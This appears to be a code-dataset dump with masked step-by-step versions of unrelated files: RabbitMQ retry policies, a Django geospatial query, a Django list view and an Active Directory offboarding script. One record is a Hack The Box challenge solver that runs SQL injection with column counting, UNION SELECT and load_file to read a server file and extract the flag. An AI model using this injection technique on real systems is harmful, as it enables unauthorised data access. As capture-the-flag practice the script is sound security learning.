envelope.get_header('x-death')\n\n if death_header is None:\n return 0\n\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n # type: (BaseRetryPolicy, int) -> str\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. 
The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(\n self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)\n\n # To avoid frequent queue create and destroy for low retry delays\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n\n self.consumer.channel.queue_declare(\n callback=None,\n queue=retry_queue_name,\n durable=self.consumer.durable,\n nowait=True,\n arguments={\n 'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms,\n 'x-expires': queue_ttl\n })\n logger.warning(\n 'Retry queue \"{}\" is created/redeclared'.format(retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self,\n consumer,\n initial_delay,\n max_delay,\n delay_incremented_by,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> 
None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy,\n self).__init__(consumer, retry_queue_suffix, **kwargs)\n\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n # type: (UnlimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. 
Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + (death_count * self.delay_incremented_by)\n\n if delay > self.max_delay:\n delay = self.max_delay\n\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n retry_delays,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. 
Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,\n **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n # type: (LimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n else:\n logger.warning(\n 'Message [{}] exceeded retry limit; death count: {}'.format(\n envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(\n envelope.delivery_tag, requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id))\n\n\nclass 
FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n # type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n initial_delay=delay,\n max_delay=delay,\n delay_incremented_by=0,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n delay,\n retries_limit,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n retry_delays=retry_delays,\n retry_queue_suffix=retry_queue_suffix,\n 
**kwargs)\n",
"step-ids": [
9,
13,
15,
23,
27
]
}
|
[
9,
13,
15,
23,
27
] |
import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv)<2:
print("Syntax : python %s <port>")%(str(sys.argv[0]))
else:
print('-'*55)
print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
print('-'*55)
r=requests.session()
port=str(sys.argv[1])
url="http://docker.hackthebox.eu:"
url=url+port
uri="/portfolio.php?id=1"
url=url+uri
print("[*]SQLi Affected URI : %s")%(uri)
print("[*]Counting Columns")
for x in range(1,20):
payload=(" order by %i --+")%(x)
nurl=url+payload
op=r.get(nurl)
soup=BeautifulSoup(op.text,'html.parser')
soup=soup.find('p')
soup=str(soup)
size=len(soup.split())
print("[*]Page size at order by %s : %s")%(x,size)
if size < 36 :
col= x-1
break
print("-"*55)
print("[*]Number of Columns : %d")%(col)
print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'")
upayload=" union all select 1"
for x in range(2,col+1):
x=str(x)
upayload=upayload+","+x
upayload=upayload+" --+"
url=url+upayload
print("[*]Executing. : %s")%(url)
op=r.get(url)
op=str(op.text)
if op.find("2"):
print("[*]Column 2 is reflected");
print("[*]Injecting payloads in column 2....");
upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')')
url="http://docker.hackthebox.eu:"+port+uri+upayload
print("[*]Excecuting : %s")%(url)
op=r.get(url)
op=str(op.text)
op=re.search("HTB.*?<",op)
op=str(op.group())
op=op.replace('<','')
print("-"*55)
print("[*]Flag : %s")%(op)
|
normal
|
{
"blob_id": "88ec9484e934ce27b13734ca26f79df71b7677e6",
"index": 82,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\n<mask token>\nprint('[*]Executing. : %s') % url\n<mask token>\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\n<mask token>\nprint('[*]Excecuting : %s') % url\n<mask token>\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-3": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-4": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-5": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv)<2:\n print(\"Syntax : python %s <port>\")%(str(sys.argv[0]))\nelse:\n print('-'*55)\n print(\"HTB WEB-CHALLENGE coded by ZyperX [Freelance]\")\n print('-'*55)\n r=requests.session()\n port=str(sys.argv[1])\n url=\"http://docker.hackthebox.eu:\"\n url=url+port\n uri=\"/portfolio.php?id=1\"\n url=url+uri\n print(\"[*]SQLi Affected URI : %s\")%(uri)\n print(\"[*]Counting Columns\")\n for x in range(1,20):\n payload=(\" order by %i --+\")%(x)\n nurl=url+payload\n op=r.get(nurl)\n soup=BeautifulSoup(op.text,'html.parser')\n soup=soup.find('p')\n soup=str(soup)\n size=len(soup.split())\n print(\"[*]Page size at order by %s : %s\")%(x,size)\n if size < 36 :\n col= x-1\n break \n print(\"-\"*55)\n print(\"[*]Number of Columns : %d\")%(col)\n print(\"[*]Web App Vulnerable with FILE PRIVILEGE SQLI\")\n print(\"[*]Trying to read content of \\'/var/www/html/administrat/panel.php\\'\")\n upayload=\" union all select 1\"\n for x in range(2,col+1):\n x=str(x)\n upayload=upayload+\",\"+x\nupayload=upayload+\" --+\"\nurl=url+upayload\nprint(\"[*]Executing. : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nif op.find(\"2\"):\n print(\"[*]Column 2 is reflected\");\n print(\"[*]Injecting payloads in column 2....\");\nupayload=upayload.replace('2','load_file(\\'/var/www/html/administrat/panel.php\\')')\nurl=\"http://docker.hackthebox.eu:\"+port+uri+upayload\nprint(\"[*]Excecuting : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nop=re.search(\"HTB.*?<\",op)\nop=str(op.group())\nop=op.replace('<','')\nprint(\"-\"*55)\nprint(\"[*]Flag : %s\")%(op)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
{
"module_spec": {
"module_name": "Spec1"
}
}
|
normal
|
{
"blob_id": "1cfb0690ebe1d7c6ab93fa6a4bc959b90b991bc8",
"index": 7016,
"step-1": "<mask token>\n",
"step-2": "{'module_spec': {'module_name': 'Spec1'}}\n",
"step-3": "{\n \"module_spec\": {\n \"module_name\": \"Spec1\"\n }\n}\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_organizations_by_address_border(city: str, nodes: list[tuple[float,
float]]) ->list[dict[str, Any]]:
result = []
radius = 0.0025
with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:
cursor = connection.cursor()
lat, lon = get_average_point(nodes)
south, north = lat - radius, lat + radius
west, east = lon - radius, lon + radius
request_template = (
f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'
)
organizations_within_radius = []
nodes_columns = get_table_columns(cursor, 'nodes')
ways_columns = get_table_columns(cursor, 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
nodes_columns, cursor.fetchall())
request_template = request_template.replace('nodes', 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
ways_columns, cursor.fetchall())
for organization in organizations_within_radius:
if is_point_in_polygon((organization['lat'], organization['lon']),
nodes):
result.append(organization)
return result
<|reserved_special_token_1|>
import os
import sqlite3
from typing import Any
from direct_geocoder import get_table_columns
from reverse_geocoder import is_point_in_polygon
from utils import zip_table_columns_with_table_rows, get_average_point
def get_organizations_by_address_border(city: str, nodes: list[tuple[float,
float]]) ->list[dict[str, Any]]:
result = []
radius = 0.0025
with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:
cursor = connection.cursor()
lat, lon = get_average_point(nodes)
south, north = lat - radius, lat + radius
west, east = lon - radius, lon + radius
request_template = (
f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'
)
organizations_within_radius = []
nodes_columns = get_table_columns(cursor, 'nodes')
ways_columns = get_table_columns(cursor, 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
nodes_columns, cursor.fetchall())
request_template = request_template.replace('nodes', 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
ways_columns, cursor.fetchall())
for organization in organizations_within_radius:
if is_point_in_polygon((organization['lat'], organization['lon']),
nodes):
result.append(organization)
return result
<|reserved_special_token_1|>
import os
import sqlite3
from typing import Any
from direct_geocoder import get_table_columns
from reverse_geocoder import is_point_in_polygon
from utils import zip_table_columns_with_table_rows, get_average_point
def get_organizations_by_address_border(city: str,
                                        nodes: list[tuple[float, float]]) \
        -> list[dict[str, Any]]:
    """Return named OSM nodes/ways of *city* lying inside the polygon *nodes*.

    A coarse bounding-box query around the polygon's average point selects
    candidates with a name/shop/amenity tag; the exact point-in-polygon
    test then filters them.

    :param city: city name; the database lives at ``db/<city>.db``.
    :param nodes: polygon vertices as (lat, lon) pairs.
    :return: matching rows as column-name -> value dictionaries.
    """
    result = []
    radius = 0.0025  # bounding-box half-size, in degrees
    # "with sqlite3.connect(...)" would only commit/rollback the transaction,
    # not close the connection -- use try/finally to avoid leaking it.
    connection = sqlite3.connect(os.path.join('db', f'{city}.db'))
    try:
        cursor = connection.cursor()
        lat, lon = get_average_point(nodes)
        south, north = lat - radius, lat + radius
        west, east = lon - radius, lon + radius
        request_template = "SELECT * FROM nodes WHERE " \
                           "(lat BETWEEN ? AND ?) AND " \
                           "(lon BETWEEN ? AND ?) AND " \
                           "(highway IS NULL) AND" \
                           "(NOT(name IS NULL) OR " \
                           "NOT(shop IS NULL) OR " \
                           "NOT(amenity IS NULL))"
        nodes_columns = get_table_columns(cursor, 'nodes')
        ways_columns = get_table_columns(cursor, 'ways')
        cursor.execute(request_template, (south, north, west, east))
        organizations_within_radius = zip_table_columns_with_table_rows(
            nodes_columns, cursor.fetchall())
        # 'nodes' only occurs as the table name, so a plain replace is safe.
        request_template = request_template.replace('nodes', 'ways')
        cursor.execute(request_template, (south, north, west, east))
        organizations_within_radius += zip_table_columns_with_table_rows(
            ways_columns, cursor.fetchall())
    finally:
        connection.close()
    for organization in organizations_within_radius:
        if is_point_in_polygon((organization['lat'], organization['lon']),
                               nodes):
            result.append(organization)
    return result
|
flexible
|
{
"blob_id": "79f945694f853e5886b590020bb661ecd418510d",
"index": 4567,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_organizations_by_address_border(city: str, nodes: list[tuple[float,\n float]]) ->list[dict[str, Any]]:\n result = []\n radius = 0.0025\n with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:\n cursor = connection.cursor()\n lat, lon = get_average_point(nodes)\n south, north = lat - radius, lat + radius\n west, east = lon - radius, lon + radius\n request_template = (\n f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'\n )\n organizations_within_radius = []\n nodes_columns = get_table_columns(cursor, 'nodes')\n ways_columns = get_table_columns(cursor, 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n nodes_columns, cursor.fetchall())\n request_template = request_template.replace('nodes', 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n ways_columns, cursor.fetchall())\n for organization in organizations_within_radius:\n if is_point_in_polygon((organization['lat'], organization['lon']),\n nodes):\n result.append(organization)\n return result\n",
"step-3": "import os\nimport sqlite3\nfrom typing import Any\nfrom direct_geocoder import get_table_columns\nfrom reverse_geocoder import is_point_in_polygon\nfrom utils import zip_table_columns_with_table_rows, get_average_point\n\n\ndef get_organizations_by_address_border(city: str, nodes: list[tuple[float,\n float]]) ->list[dict[str, Any]]:\n result = []\n radius = 0.0025\n with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:\n cursor = connection.cursor()\n lat, lon = get_average_point(nodes)\n south, north = lat - radius, lat + radius\n west, east = lon - radius, lon + radius\n request_template = (\n f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'\n )\n organizations_within_radius = []\n nodes_columns = get_table_columns(cursor, 'nodes')\n ways_columns = get_table_columns(cursor, 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n nodes_columns, cursor.fetchall())\n request_template = request_template.replace('nodes', 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n ways_columns, cursor.fetchall())\n for organization in organizations_within_radius:\n if is_point_in_polygon((organization['lat'], organization['lon']),\n nodes):\n result.append(organization)\n return result\n",
"step-4": "import os\nimport sqlite3\nfrom typing import Any\n\nfrom direct_geocoder import get_table_columns\nfrom reverse_geocoder import is_point_in_polygon\nfrom utils import zip_table_columns_with_table_rows, get_average_point\n\n\ndef get_organizations_by_address_border(city: str,\n nodes: list[tuple[float, float]]) \\\n -> list[dict[str, Any]]:\n result = []\n radius = 0.0025\n with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:\n cursor = connection.cursor()\n lat, lon = get_average_point(nodes)\n south, north = lat - radius, lat + radius\n west, east = lon - radius, lon + radius\n request_template = f\"SELECT * FROM nodes WHERE \" \\\n f\"(lat BETWEEN ? AND ?) AND \" \\\n f\"(lon BETWEEN ? AND ?) AND \" \\\n f\"(highway IS NULL) AND\" \\\n f\"(NOT(name IS NULL) OR \" \\\n f\"NOT(shop IS NULL) OR \" \\\n f\"NOT(amenity IS NULL))\"\n organizations_within_radius = []\n nodes_columns = get_table_columns(cursor, 'nodes')\n ways_columns = get_table_columns(cursor, 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n nodes_columns,\n cursor.fetchall())\n request_template = request_template.replace('nodes', 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n ways_columns,\n cursor.fetchall())\n for organization in organizations_within_radius:\n if is_point_in_polygon((organization['lat'], organization['lon']),\n nodes):\n result.append(organization)\n return result\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.shortcuts import render
from django.views.generic.list import ListView
from .models import Student
# Create your views here.
class StudentListView(ListView):
    """List the students of the Python course, with a cookie-based
    template override.

    Context exposes the filtered queryset as ``object_list`` plus the full
    roster (ordered by name) as ``freshers``.
    """
    model = Student
    # Custom template_name takes priority over the default
    # "<app>/<model>_list.html" lookup.
    template_name = 'staff/student_list.html'
    ordering = ['name']

    def get_queryset(self):
        """Only students enrolled in the Python course."""
        return Student.objects.filter(course='Python')

    def get_context_data(self, *args, **kwargs):
        """Add the full, name-ordered student list under 'freshers'."""
        context = super().get_context_data(*args, **kwargs)
        context['freshers'] = Student.objects.all().order_by('name')
        return context

    def get_template_names(self):
        """Serve a personalised template when the 'user' cookie is 'farzam'.

        Uses COOKIES.get() so a request without the cookie falls back to the
        default template instead of raising KeyError (HTTP 500).
        """
        if self.request.COOKIES.get('user') == 'farzam':
            return 'staff/farzam.html'
        return self.template_name
|
normal
|
{
"blob_id": "bcad9869e6bc9b17eee490897b4b706171381366",
"index": 2093,
"step-1": "<mask token>\n\n\nclass StudentListView(ListView):\n <mask token>\n <mask token>\n <mask token>\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass StudentListView(ListView):\n <mask token>\n <mask token>\n <mask token>\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n return context\n\n def get_template_names(self):\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n return template_name\n",
"step-3": "<mask token>\n\n\nclass StudentListView(ListView):\n model = Student\n template_name = 'staff/student_list.html'\n ordering = ['name']\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n return context\n\n def get_template_names(self):\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n return template_name\n",
"step-4": "from django.shortcuts import render\nfrom django.views.generic.list import ListView\nfrom .models import Student\n\n\nclass StudentListView(ListView):\n model = Student\n template_name = 'staff/student_list.html'\n ordering = ['name']\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n return context\n\n def get_template_names(self):\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n return template_name\n",
"step-5": "from django.shortcuts import render\nfrom django.views.generic.list import ListView\nfrom .models import Student\n\n# Create your views here.\nclass StudentListView(ListView):\n model = Student\n\n # Custom has a HIGH priority than default in any field\n\n template_name = 'staff/student_list.html'\n # template_name_suffix = '_list'\n ordering = ['name']\n # context_object_name = 'students'\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n\n return context\n\n\n def get_template_names(self):\n # if self.request.user.is_superuser:\n # template_name = 'staff/admin.html'\n # elif self.request.user.is_staff:\n # template_name = 'staff/staff.html'\n # else:\n # template_name = self.template_name\n # return template_name\n\n\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n\n return template_name",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import json
import os
import ssl
from ldap3 import Server, Connection, Tls, SUBTREE, ALL
# Root CA certificate path -- required when the AD server uses a
# self-signed certificate; must point at a PEM file readable by this script.
SSL_CERT_PATH = "path/to/cert.pem"
# FQDN of the Domain Controller to bind to (LDAPS).
FQDN = "ad.example.com"
# Search base: DN of the container under which the user accounts live.
search_base='OU=Sites,DC=ad,DC=example,DC=com'
def deprovision_AD(email):
    """Offboard the AD account whose ``mail`` attribute equals *email*.

    Binds to the Domain Controller over LDAPS, finds the account, removes it
    from all of its groups, adds it to a (placeholder) security group,
    disables it and moves it to a (placeholder) OU.

    Returns "Success", or an error string when no account matched.

    NOTE(review): ``get_secret`` is neither defined nor imported in this
    file -- presumably a secrets-manager helper provided elsewhere; confirm.
    NOTE(review): if several accounts share the mail attribute, only the
    LAST matching entry is offboarded (dn is overwritten in the loop below).
